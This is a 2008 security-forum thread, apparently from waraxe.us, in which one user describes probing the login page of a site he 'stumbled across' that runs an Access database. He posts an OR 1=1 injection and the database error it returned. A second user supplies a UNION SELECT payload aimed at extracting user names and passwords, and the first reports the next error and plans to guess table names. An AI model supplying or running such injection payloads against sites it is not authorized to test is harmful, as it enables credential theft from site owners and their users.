|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 98
Members: 0
Total: 98
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
SQL Injection V Access |
|
Posted: Sun Jun 08, 2008 1:27 pm |
|
|
tinman |
Active user |
|
|
Joined: May 11, 2008 |
Posts: 37 |
|
|
|
|
|
|
|
Stumbled across a site with (perhaps) an insecure access DB. I appreciate they are not much use (unless you can run VB script through them???).
I know that you can't comment out access like proper DBMS, but I am able to do this when I enter : any : in the username field and: any' OR 1=1%00 : in the password field.
Code: | Microsoft JET Database Engine error '80040e14'
Syntax error in query expression 'nickname = 'any' and userspass = 'any' or 1=1%00''.
/login.asp, line 20 |
Any suggestions to play with this? I'm still very new at this. |
|
|
|
|
Posted: Sun Jun 08, 2008 4:54 pm |
|
|
kieuanh |
Regular user |
|
|
Joined: Mar 22, 2008 |
Posts: 23 |
|
|
|
|
|
|
|
try this
Quote: | ' and 1=2 union select user,password from users where ''=' | [/quote] |
|
|
|
|
Posted: Sun Jun 08, 2008 5:58 pm |
|
|
tinman |
Active user |
|
|
Joined: May 11, 2008 |
Posts: 37 |
|
|
|
|
|
|
|
Code: | Microsoft JET Database Engine error '80040e37'
The Microsoft Jet database engine cannot find the input table or query 'users'. Make sure it exists and that its name is spelled correctly.
/login.asp, line 20 |
I guess a play with the table names is in order! Thank you very much! |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|